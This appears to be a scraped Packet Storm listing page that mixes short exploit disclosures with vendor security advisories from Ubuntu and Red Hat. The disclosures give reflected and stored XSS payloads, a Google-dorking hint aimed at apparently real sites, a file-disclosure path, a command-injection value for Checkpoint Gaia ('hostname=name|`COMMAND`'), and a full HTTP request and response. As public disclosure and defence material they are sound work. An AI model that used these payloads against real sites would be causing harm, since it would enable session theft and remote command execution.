WebIncorp CMS version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : WebIncorp CMS v1.0 XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : http://www.webincorp.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /product_detail.php?prod_id=132'"><svg/onload=prompt(1337);>[+] https://wfutureqatarqa/product_detail.php?prod_id=132%27%22%3E%3Csvg/onload=prompt(1337);%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WebIncorp CMS 1.0 Cross Site Scripting

PHPJabbers Bus Reservation System version 1.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Bus Reservation System 1.1 - Reflected XSS# Exploit Author: CraCkEr# Date: 20/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/bus-reservation-system/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4111## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&hide=0&index=[XSS]&session_id=Path: /index.phpGET parameter 'pickup_id' is vulnerable to RXSShttps://website/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=[XSS]&session_id=[-] Done

PHPJabbers Bus Reservation System 1.1 Cross Site Scripting

PHPJabbers Availability Booking Calendar version 5.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Availability Booking Calendar 5.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 20/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/availability-booking-calendar/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4110## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'session_id' is vulnerable to RXSShttps://website/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=[XSS]&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0[-] Done

PHPJabbers Availability Booking Calendar 5.0 Cross Site Scripting

WEBinsta Mailing Manager version 1.3 suffers from an information disclosure vulnerability.

    ====================================================================================================================================| # Title     : WEBinsta Mailing Manager V1.3 Data Disclosure Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://www.webinsta.com                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : maillist/temp/email.txt[+] http://lolpriceshopinfo/maillist/temp/email.txtGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WEBinsta Mailing Manager 1.3 Information Disclosure

Ubuntu Security Notice 6267-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Max Vlasov discovered that Firefox Offscreen Canvas did not properly track cross-origin tainting. An attacker could potentially exploit this issue to access image data from another site in violation of same-origin policy.

    ==========================================================================Ubuntu Security Notice USN-6267-1August 02, 2023firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2023-4047,CVE-2023-4048, CVE-2023-4049, CVE-2023-4051, CVE-2023-4053, CVE-2023-4055,CVE-2023-4056, CVE-2023-4057, CVE-2023-4058)Max Vlasov discovered that Firefox Offscreen Canvas did not properly trackcross-origin tainting. An attacker could potentially exploit this issue toaccess image data from another site in violation of same-origin policy.(CVE-2023-4045)Alexander Guryanov discovered that Firefox did not properly update thevalue of a global variable in WASM JIT analysis in some circumstances. Anattacker could potentially exploit this issue to cause a denial of service.(CVE-2023-4046)Mark Brand discovered that Firefox did not properly validate the size ofan untrusted input stream. An attacker could potentially exploit this issueto cause a denial of service. (CVE-2023-4050)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         116.0+build2-0ubuntu0.20.04.2After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6267-1  CVE-2023-4045, CVE-2023-4046, CVE-2023-4047, CVE-2023-4048,  CVE-2023-4049, CVE-2023-4050, CVE-2023-4051, CVE-2023-4053,  CVE-2023-4055, CVE-2023-4056, CVE-2023-4057, CVE-2023-4058Package Information:  https://launchpad.net/ubuntu/+source/firefox/116.0+build2-0ubuntu0.20.04.2

Ubuntu Security Notice USN-6267-1

Checkpoint Gaia Portal version R81.10 suffers from a remote command execution vulnerability.

     =========================Exploit Title: Hostname injection leads to Remote Code Execution RCE (Authenticated)Product: Gaia PortalVendor: CheckpointVulnerable Versions: R81.20 < Take 14, R81.10 < Take 95, R81 < Take 82 and R80.40 < Take 198Tested Version: R81.10 (take 335)Advisory Publication: July 27, 2023Latest Update: July 72, 2023Vulnerability Type: Improper Control of Generation of Code (Code Injection) [CWE-94]CVE Reference: CVE-2023-28130CVSS Severity: HighCVSS Score: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:HImpact score: 8.4Credit: Rick Verdoes & Danny de Weille (Hackify | pentests.nl)========================= I. BACKGROUND-------------------------Check Point Gaia Portal is an advanced web-based interface designed for the configuration of the Gaia platform, a security operating system that combines the strengths of both SecurePlatform and IPSO operating systems. The Gaia Portal allows for nearly all system configuration tasks to be performed through this interface. II. VULNERABILITY-------------------------Check Point Gaia Portal has a vulnerability which allows an authenticated user with write permissions on the DNS settings to inject commands in a cgi script, leading to remote code execution on the operating system. The vulnerability lies in the parameter hostname in the web request /cgi-bin/hosts_dns.tcl, which is susceptible to command injection. This can be exploited by any user with a valid session, as long as the user has write permissions on the DNS settings. The injected commands are executed by the user 'Admin'. III. Proof of Concept-------------------------hostname=name|`COMMAND`&domainname=test.local&save=1 IV. Impact-------------------------Successful exploitation allows a remote authenticated attacker to execute commands on the operating system. V. References-------------------------Security advisories:https://pentests.nl/pentest-blog/cve-2023-28130-command-injection-in-check-point-gaia-portal/https://support.checkpoint.com/results/sk/sk181311

Checkpoint Gaia Portal R81.10 Remote Command Execution

Red Hat Security Advisory 2023-4431-01 - Iperf is a tool which can measure maximum TCP bandwidth and tune various parameters and UDP characteristics. Iperf reports bandwidth, delay jitter, and data-gram loss.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: iperf3 security update  
Advisory ID:       RHSA-2023:4431-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4431  
Issue date:        2023-08-02  
CVE Names:         CVE-2023-38403   
=====================================================================

1. Summary:

An update for iperf3 is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

Iperf is a tool which can measure maximum TCP bandwidth and tune various  
parameters and UDP characteristics. Iperf reports bandwidth, delay jitter,  
and data-gram loss.

Security Fix(es):

* iperf3: memory allocation hazard and crash (CVE-2023-38403)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2222204 - CVE-2023-38403 iperf3: memory allocation hazard and crash

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
iperf3-3.9-10.el9_0.src.rpm

aarch64:  
iperf3-3.9-10.el9_0.aarch64.rpm  
iperf3-debuginfo-3.9-10.el9_0.aarch64.rpm  
iperf3-debugsource-3.9-10.el9_0.aarch64.rpm

ppc64le:  
iperf3-3.9-10.el9_0.ppc64le.rpm  
iperf3-debuginfo-3.9-10.el9_0.ppc64le.rpm  
iperf3-debugsource-3.9-10.el9_0.ppc64le.rpm

s390x:  
iperf3-3.9-10.el9_0.s390x.rpm  
iperf3-debuginfo-3.9-10.el9_0.s390x.rpm  
iperf3-debugsource-3.9-10.el9_0.s390x.rpm

x86_64:  
iperf3-3.9-10.el9_0.i686.rpm  
iperf3-3.9-10.el9_0.x86_64.rpm  
iperf3-debuginfo-3.9-10.el9_0.i686.rpm  
iperf3-debuginfo-3.9-10.el9_0.x86_64.rpm  
iperf3-debugsource-3.9-10.el9_0.i686.rpm  
iperf3-debugsource-3.9-10.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38403  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkymZaAAoJENzjgjWX9erE/pYQAINylqnutjNN7z0ZM10ks87n  
2aIm5INuxrKtLIr4EMPIJ0q0uAZCACqDYDTEH1rGKpbEolUz+KRTmyYUQDYHihde  
jix7wg2lW+HjVwUSyxNQ1ZrH4DF5mlL2VmNyjQFOdzvW7RetZkkAUBUFhYyrrtlM  
aCXliGAzBCni1GsTpXtxGSwD8FMFu845Ua/W0gwp/7BL/+9ECzlPyyFVzDwj53Fp  
ki+m+xsv2oW99cJcLPudj2t3qdhBqwy5n9fQ8dvKqrS3qU7QeTbVCzJ+6ic8KV0R  
v71+VQwKh4SKhSnkib/YeZ3RW80+4oOYzPY8Ifll7uV0rfIwPYrndCCI9JcI+Cu2  
x3VgVIZ6DQ8c68DHQi6ls9QOOnzm8wijmq6Esp4DtIXzdqsCpaoe0IJcusvVnsyc  
BhjlsVu6iNJimuN2lP0VcN3h2JOmZrxQSup3qWjVoGHXvhcnPiTX/voF/GdALa/Y  
rFHbm3iche92wL6svV7Lw2gljQ3K1EdWUZDwrvxVMTF778YGkJh5i1+KJ20K+j0U  
Djo/gvLU5V8YH204lWLBsoCzjesdzrH5mDXSxcjPwHCkemQQcKmz60SxYQUIZG88  
eqVQSDyNL2UksjdJdMtb2HXx6R6sZacjjes3WdWnV9hL74dvBj/TtiaGs9v9mBtV  
AVYEScDCJcQsXSPVfizU  
=7qR3  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4431-01

Red Hat Security Advisory 2023-4432-01 - Iperf is a tool which can measure maximum TCP bandwidth and tune various parameters and UDP characteristics. Iperf reports bandwidth, delay jitter, and data-gram loss.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: iperf3 security update  
Advisory ID:       RHSA-2023:4432-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4432  
Issue date:        2023-08-02  
CVE Names:         CVE-2023-38403   
=====================================================================

1. Summary:

An update for iperf3 is now available for Red Hat Enterprise Linux 8.4  
Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4  
Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v.8.4) - x86_64  
Red Hat Enterprise Linux AppStream E4S (v.8.4) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Iperf is a tool which can measure maximum TCP bandwidth and tune various  
parameters and UDP characteristics. Iperf reports bandwidth, delay jitter,  
and data-gram loss.

Security Fix(es):

* iperf3: memory allocation hazard and crash (CVE-2023-38403)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2222204 - CVE-2023-38403 iperf3: memory allocation hazard and crash

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v.8.4):

Source:  
iperf3-3.5-7.el8_4.src.rpm

x86_64:  
iperf3-3.5-7.el8_4.i686.rpm  
iperf3-3.5-7.el8_4.x86_64.rpm  
iperf3-debuginfo-3.5-7.el8_4.i686.rpm  
iperf3-debuginfo-3.5-7.el8_4.x86_64.rpm  
iperf3-debugsource-3.5-7.el8_4.i686.rpm  
iperf3-debugsource-3.5-7.el8_4.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v.8.4):

Source:  
iperf3-3.5-7.el8_4.src.rpm

aarch64:  
iperf3-3.5-7.el8_4.aarch64.rpm  
iperf3-debuginfo-3.5-7.el8_4.aarch64.rpm  
iperf3-debugsource-3.5-7.el8_4.aarch64.rpm

ppc64le:  
iperf3-3.5-7.el8_4.ppc64le.rpm  
iperf3-debuginfo-3.5-7.el8_4.ppc64le.rpm  
iperf3-debugsource-3.5-7.el8_4.ppc64le.rpm

s390x:  
iperf3-3.5-7.el8_4.s390x.rpm  
iperf3-debuginfo-3.5-7.el8_4.s390x.rpm  
iperf3-debugsource-3.5-7.el8_4.s390x.rpm

x86_64:  
iperf3-3.5-7.el8_4.i686.rpm  
iperf3-3.5-7.el8_4.x86_64.rpm  
iperf3-debuginfo-3.5-7.el8_4.i686.rpm  
iperf3-debuginfo-3.5-7.el8_4.x86_64.rpm  
iperf3-debugsource-3.5-7.el8_4.i686.rpm  
iperf3-debugsource-3.5-7.el8_4.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v.8.4):

Source:  
iperf3-3.5-7.el8_4.src.rpm

aarch64:  
iperf3-3.5-7.el8_4.aarch64.rpm  
iperf3-debuginfo-3.5-7.el8_4.aarch64.rpm  
iperf3-debugsource-3.5-7.el8_4.aarch64.rpm

ppc64le:  
iperf3-3.5-7.el8_4.ppc64le.rpm  
iperf3-debuginfo-3.5-7.el8_4.ppc64le.rpm  
iperf3-debugsource-3.5-7.el8_4.ppc64le.rpm

s390x:  
iperf3-3.5-7.el8_4.s390x.rpm  
iperf3-debuginfo-3.5-7.el8_4.s390x.rpm  
iperf3-debugsource-3.5-7.el8_4.s390x.rpm

x86_64:  
iperf3-3.5-7.el8_4.i686.rpm  
iperf3-3.5-7.el8_4.x86_64.rpm  
iperf3-debuginfo-3.5-7.el8_4.i686.rpm  
iperf3-debuginfo-3.5-7.el8_4.x86_64.rpm  
iperf3-debugsource-3.5-7.el8_4.i686.rpm  
iperf3-debugsource-3.5-7.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38403  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkymZRAAoJENzjgjWX9erEj8gQAKgKpGvgECCm7hT0wbQAfWmn  
Kb+23tSUUSWVWDxwa7sez0fsvdpLlk5EN7M9aJD3zF5TBor++pGDPvzODiABiWOQ  
kzEaq0U2IEhKieHfNLuHk6ICotNq21OSEE5vKSsgaT02pZv4bte2j4x2rDxkFOf6  
HkfNjCUDAIjFXnsENbEwv0g4DnK80h4vVtVSa5MqltNdcL4KdkyFFLCbkbBzAw2U  
KDiv7QpFe7arst2PJX2MGZOzCJO9LUQB9NycfLLcSCq82LZY5vQOyoFCH0yHESmC  
3EYqXQNeh5WH5RVIaosMotbuEvROdxHtdf8b0NdBKKjsinwJu0oMT6q2zbHUUTVE  
7u2x4hriua0+YFM8pCXAVEqjS9dwHvr/MLv8WAIwfE0GJ3YWMpIouhwLWB7QEiNo  
pRtr6xqBSH6ziOZPWxIz1yOtVFtfLG5YfsGFbkQN6f4vYWJrRVddHAU8rINAKxPi  
W9iomIgZyIulhIbOXIsoExDHQmnVgMNcg68i9SZvj8gQw+zPFoANTDX9wq0jCuEg  
EWe/ot0uQbz99zgUlrWFR93el2VXiEnYncIFtbIa+KEFVrhH/rZtYsO3ykZAIhoD  
rz6dq5gG/oietQoIOAT9kyhAZk4T55HP9X9d7ZpGK8dr/mVGVimXO81ar/BQcOvz  
f+uxc6cPuJpxkOJ7sqJO  
=iwCS  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4432-01

This archive holds a whitepaper called Introduction to Web Pentesting. It provides basic configuration for Burpsuite Proxy along with basic exploitation cross site scripting, SQL injection, cross site request forgery, and open redirects. Two copies of the whitepaper are included. One is in English and one is in Bulgarian.

Introduction To Web Pentesting

Perch CMS version 3.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title:# Date: 07/2023# Exploit Author: Andrey Stoykov# Version: 3.2# Tested on: Windows Server 2022# Blog: http://msecureltd.blogspot.comXSS #1:File: roles.edit.post.phpLine #57:[...]<div class="field-wrap <?php echo $Form->error('roleTitle', false);?>">        <?php echo $Form->label('roleTitle', 'Title'); ?>        <div class="form-entry">            <?php echo $Form->text('roleTitle', $Form->get($details,'roleTitle')); ?>        </div>    </div>[...]Steps to Reproduce:1. Login to application2. Go to Roles3. Select Title4. Enter payload TEST"><img src=x onerror=alert(1)>// HTTP POST requestPOST /perch/perch/core/users/roles/edit/?id=1 HTTP/1.1Host: 192.168.1.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/114.0[...]roleTitle=TEST%22%3e%3cimg+src%3dx+onerror%3dalert%281%29%3e&privs-perch%5b%5d=1&btnsubmit=Save+changes&formaction=core&token=0389a6698f1911a162fdb71328dd2af0// HTTP responseHTTP/1.1 200 OKServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4[...][...]<a href="/perch/perch/core/users/roles/edit/?id=1">TEST"><img src=xonerror=alert(1)></a>[...]

Source

Packet Storm